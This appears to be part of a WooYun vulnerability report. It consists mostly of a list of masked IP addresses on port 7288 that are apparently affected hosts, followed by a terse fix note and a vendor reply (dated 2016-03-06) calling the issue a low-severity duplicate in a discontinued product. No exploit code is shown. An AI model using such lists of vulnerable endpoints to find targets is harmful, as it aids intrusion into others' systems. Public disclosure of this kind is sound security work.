**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
http://**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:8090/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/

修复方案:

你们懂的。

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2016-03-06 09:58

厂商回复:

您好,该问题属于与WooYun-2016- 重复问题,该产品线目前已停产。我们会通过各种渠道对使用旧版本的客户平台进行加固升级。

最新状态:

暂无